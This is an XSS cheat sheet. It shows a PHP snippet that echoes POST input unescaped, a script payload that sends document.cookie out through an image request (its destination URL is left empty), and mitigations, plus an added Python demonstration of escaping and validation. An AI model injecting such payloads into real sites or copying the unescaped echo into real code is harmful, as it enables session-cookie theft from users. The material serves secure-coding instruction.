Cross Site Scripting (XSS)


XSS Cheat Sheet:

XSS exists when tainted data is allowed to enter the context of HTML without being properly escaped.


<?php echo $_POST['name']; ?>

Examples of XSS exploits:


<script>new Image().src=''+encodeURI(document.cookie)</script>

<script src=""></script>


Mitigations:

– Validate the input

– Escape the input / output

<?php echo htmlentities($_POST['name'], ENT_QUOTES, 'UTF-8'); ?>

– Bind the session cookie to the client's IP address, so it cannot be used from another host
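Added example (not part of the original cheat sheet): the vulnerable echo beside its escaped counterpart, written in Python with `html.escape(..., quote=True)` standing in for PHP's `htmlentities($name, ENT_QUOTES, 'UTF-8')`, plus an allowlist validator for the input side. The cookie-stealing payload is the one shown above, with its URL left empty as on the page; the name pattern and the `handle_request` function are assumptions made for this example.

```python
import html
import re

# Constructed sample payload, the same one the cheat sheet shows: it tries to
# exfiltrate document.cookie by loading an image from an attacker-chosen URL
# (left empty here, exactly as on the page).
COOKIE_THEFT_PAYLOAD = "<script>new Image().src=''+encodeURI(document.cookie)</script>"

# Allowlist for a "name" field: letters, spaces, apostrophes and hyphens only.
# The pattern is an assumption for this example; real rules depend on the app.
NAME_PATTERN = re.compile(r"^[A-Za-z][-A-Za-z' ]{0,63}$")


def validate_name(name: str) -> bool:
    """Input validation: reject anything outside the allowlist."""
    return NAME_PATTERN.fullmatch(name) is not None


def render_unsafe(name: str) -> str:
    """Mirrors `<?php echo $_POST['name']; ?>`: tainted data goes straight into HTML."""
    return f"<p>Hello {name}</p>"


def render_safe(name: str) -> str:
    """Mirrors htmlentities($name, ENT_QUOTES, 'UTF-8'): html.escape with
    quote=True converts & < > \" and ' to entities, so the browser renders the
    text instead of parsing it as markup."""
    return f"<p>Hello {html.escape(name, quote=True)}</p>"


def render_attribute_safe(name: str) -> str:
    """The same escaping inside a double-quoted attribute; escaping quotes is
    what keeps the value from closing the attribute early (ENT_QUOTES matters)."""
    return f'<input name="name" value="{html.escape(name, quote=True)}">'


def handle_request(name: str) -> str:
    """Hypothetical handler applying both controls: validate first, then escape
    on output. A rejected value is never echoed back, even escaped."""
    if not validate_name(name):
        return "<p>Invalid name</p>"
    return render_safe(name)


def contains_script_tag(markup: str) -> bool:
    """Check used by the demo below: does the raw markup contain a script element?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    for label, fn in (("unsafe", render_unsafe), ("safe", render_safe)):
        out = fn(COOKIE_THEFT_PAYLOAD)
        print(f"{label:6}: script tag present = {contains_script_tag(out)}")
        print(f"        {out}")
    print("validated:", handle_request(COOKIE_THEFT_PAYLOAD))
    print("validated:", handle_request("O'Neil"))
```

Run it directly to see the escaped output next to the raw one. Escaping is context-specific: the entity encoding shown here is correct for HTML text and quoted attribute values, which is the context the cheat sheet's `echo` lands in; data placed inside a `<script>` block or a URL needs the encoding for that context instead.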
